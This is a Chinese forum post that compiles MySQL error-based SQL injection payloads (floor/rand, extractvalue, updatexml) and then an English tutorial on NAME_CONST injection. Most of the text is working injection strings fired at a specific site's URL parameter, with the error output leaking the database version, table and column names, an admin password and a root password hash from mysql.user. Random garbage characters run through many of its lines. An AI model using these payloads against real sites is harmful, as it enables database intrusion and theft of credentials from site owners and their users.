|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:% W6 K# b$ A' y
首先进行正常查询: mysql> select * from article where id = 1;
! X- ] n: b# a) z# ^+—-+——-+———+; ~+ f8 h; T! P
| id | title | content |- d4 R0 }8 j8 h. r1 s0 f, u) ?& m
+—-+——-+———+: I E# t' q& S+ t$ ^$ ^
| 1 | test | do it |
( ?% V! d/ i1 k( v5 }+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& K- D8 o0 y q- n8 tERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 T( j/ v$ A% L. K: `) i
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
4 l# D. H5 }+ c( a+ b v: BERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
7 O/ T" z$ i* zERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue4 N) P5 r( @! n& J
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–& u4 g) v+ S9 g# j- Q9 ^; D, W
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
! S' j9 q3 z: E
# X$ {) D3 r) U6 p% L# l再收集: & q+ d$ D8 x( _; c) x- Q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
/ H5 N ]! w. { p/ v) i' a
8 o) J; p% s* j2 ^Error uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’$ l" u& q6 _0 y: t$ u
4 x8 F8 c6 j# t: [. whttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)+ Z/ {0 G! `$ H, |$ ?: ?- B
( _7 @) O2 n: _
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
]5 m3 |# u c/ o3 {; n3 G6 R7 c/ {( H3 i3 z2 A
MYSQL高版本报错注入技巧-利用NAME_CONST注入9 f1 P1 w4 c/ g5 Y2 |, v; L# l- c
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
; @, U0 {& \( {6 A! q+ k
. O& G# S3 x! C+ m2 r, o6 N; K) Z- i' P$ d
相关信息% g! c O+ W8 @& L
5 p" `4 I% D& R+ _
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.5 F w, h7 U0 i5 _5 Z
3 u2 n$ E# B+ A' `6 |8 K% ~3 {, O
Code:
/ j# g5 O J m( VNAME_CONST(DATA, VALUE)6 w: G. X$ Y% L& K8 ^2 N" i3 c
: _" g# H* V) C5 j3 }4 G$ L9 @Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
5 k( B; H- d& M+ X! ~ |$ ]/ Q5 g/ H* b9 {
SELECT NAME_CONST('TEST', 1)6 S o% x) G" f1 ]0 l
: \' j0 Y9 Q8 K. m4 W2 a3 `, E" c1 z- \
; K I" |5 \- |2 P+ L" D, h! _
|---------------|; \) ~8 z" m( J8 ^8 ~
| TEST |
9 B) P1 e+ w: L/ M; h1 o| |9 V0 K( l. K$ i9 t
|---------------|6 N! v; y* J0 ]4 m, N& q
| 1 |1 e) K( F0 H+ n* U( i
| |- F, q+ d+ \) g9 K$ q
|---------------|
5 j8 l/ b1 ]& B" E- C7 v
* O' W* u9 ^; s' Z/ v1 ~, D/ `0 B ?. n* c2 V
/ ?8 H8 }& j7 v9 f0 c' `( }* W4 u
! l2 X0 ?; `2 `" v) j( Y0 Xhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const) p7 q& R, H$ N$ x) A
Intro to MySQL Variables1 ~6 G+ Q% k' F/ D: Y& s
! D8 v0 |) ~5 t. @, b/ h) Q
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST. @3 n- U# W% Q* q. A4 p
2 ]. L0 F: l4 E% g+ [4 FCode:
4 \- g' ?$ |) y: e6 C1 w# a9 ahttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261* b4 ~, H6 e) q% u# y0 `
9 R, s5 T& N! E+ A5 d/ D+ x8 q- @* T( H; Z' T+ |0 g4 M
$ C0 d4 _1 H- |2 w
+ F: X" {; O8 M/ x m7 V4 i% Y, }: e2 \) u9 j9 [% w5 L6 F
Code:) J! z: |9 K5 [0 O+ _& O& K5 A
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
, a# g7 q" C( @% ?4 p7 c' j! N5 n8 P: ?& S/ S
9 I V2 ^) z1 o9 V5 _1 J
VAR = Your MySQL variable.: s$ P7 j' L' E9 p& k
+ k6 M, U# Y$ Q' ] f7 {MySQL 5.1.3 Server System Variables; ^! }6 [8 h6 E$ [' }1 \, h
5 O7 H* u' ^9 ?! j' Z @" r
Let's try it out on my site..) M% M8 @, q: E% V
4 Y1 c- [ o3 n+ J/ c3 l& t( q. r/ GCode:/ Y) E! h4 [$ t1 t
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
2 G- w* s0 Q8 @7 n: B7 M$ w* i8 A2 }9 _
% v1 @' e1 ]( G) ]! YErroruplicate column name '5.0.27-community-nt'6 k9 j+ _+ {6 p7 J$ X- R0 I
[/ C7 `) P9 z* K( w( B4 {+ F) ` e y
) s- w0 Z2 n5 p7 i1 H, w$ M
- y+ Y+ [; M/ R3 B1 r. q: `4 b0 X
: b; _! A G0 m) t1 n# ], \/ tNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...7 L7 j% J, l/ ^5 ~
7 l# M5 H# n" {+ ]9 V7 b
Data Extraction/ S7 u7 K/ P; w" [
; x" r6 d( G2 U8 b7 t
Code:( h$ x7 ~! m8 o; y
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
8 c4 D, c6 \4 p# F. z( K5 z
5 g3 D% K! b' v6 w- Y" _+ @! R4 j3 J3 g4 c
We should get a duplicate column 1 error...
8 Y& c8 ]7 J, y( m! @
% i2 l0 K4 ~# B$ n5 LCode:
5 ^, ]! f# U* d1 ~' chttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' t# U* z( v0 L( Z3 c5 _: L2 k4 \! a0 a* I6 w h$ p
Erroruplicate column name '1
3 J" ?- _8 l+ n) ~; }5 m
# M5 r& `* p/ f" ~$ {" W# j7 L9 g3 \( |$ O
9 I7 D. x, }8 {: s t9 h% u
5 z4 ^3 v9 M. a% Z" e- A# i8 N k& D
7 [' M9 n C& V" Z$ A! q. wNow let's get the tables out this bitch..
. h$ c0 Y' [2 ?1 y& ~0 }7 n2 m. L/ q0 t; w0 o9 a/ | [
Code:1 Y+ m& A2 g4 n( B$ E5 o
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)-- |) F$ d( f( k6 c u4 h1 z
; ~8 q! D* }2 D$ S8 }) [$ [
( k+ \/ P* W- D- n7 x6 {Let's see if it works here, if it does, we can go on and finish the job.1 q2 B. Z3 q' O
) G w, d( }" o' y; \, i
Code:
6 e3 d2 ], V# Q R+ Chttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
3 P2 E8 Z# x# ]
" ^( L* h% A* f% m& q5 ]
5 E% F/ F% T0 t7 `# Q; r7 _& zErroruplicate column name 'com_admanage2 C. X! K8 P6 P: t
2 C- K* H" @; y- U6 ?$ n0 p5 h
4 p1 i2 Q) F/ \6 l5 _5 [) H; x) y) E4 K
% ]% a/ m& I( `0 v6 [
+ l8 s6 P! \/ j! B8 y0 |" H
! M! `" k+ c) o2 F$ }( z+ hNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
0 n9 Y y7 x9 Q) U c" E
: Q% e* c9 a' ELet's get the columns out of the user table..( D9 X' A( d V6 R* e
/ V% {/ `% d3 x* ^Code:
6 T8 c# s6 ~( E! r+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--0 R/ C6 j' u# s5 K
4 T1 O- b& x: B
& A, I6 w. A; m7 T
So mine looks like this, and I get the duplicate column name 'Host'.
* y2 g( u) |/ h, ^
" K* T4 y9 @' R; `Code:) M* l& R8 S o. ]# g
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
2 ~2 ?4 |) \' k( E6 {5 f l$ v8 u1 R5 P2 X$ y/ p: `: m
Erroruplicate column name 'Host'
- Z9 N+ L' n0 K5 h. t4 X/ r& S. Q8 Q4 \' E+ r, A
; t& F' y T( y: U. j, d) _! s/ W0 `
, L7 H! }3 n% O5 ^3 K/ E i4 |8 g- N9 ^1 r- q# W/ `* S
9 T3 R6 j" v1 g1 f7 I+ F% Y( e/ O, v
Woot, time to finish this bitch off./ K U, A9 G9 Y5 P
/ W. W) Y1 Z7 j. q! e4 k
Code:
+ L1 {& s0 p/ X. Z+ @# G+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
3 j _8 i R2 Y) Y2 o2 i" Z! G8 U6 f3 P
M- I* H. H4 z0 p) R T' uSo mine looks like this...% d, ^) P: `6 H' F+ c( h
+ z! n, X; W2 m7 ACode:. L: H- x) r# ]( I3 ~$ L% h& E C! X
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--* D: y5 {5 ^; f- t7 k$ d. @* z
8 ]- X# v3 X# `7 xErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 k4 U6 ?7 Y1 B7 f6 I9 Q: Y9 p4 F! Q5 v/ a! x& t
( H& w! D4 W7 a; F% _
! |* r* M$ F! X6 t5 i( l
. f' t* {. c3 v
- H' M5 S' E7 Y Z
8 |6 |% G% v( o# VAnd there we have it, thanks for reading.
" \6 R0 C: W; Z+ Q. a6 j9 ~$ {9 \/ M
|
发表于 2015-11-11 19:03:37
收藏
支持
反对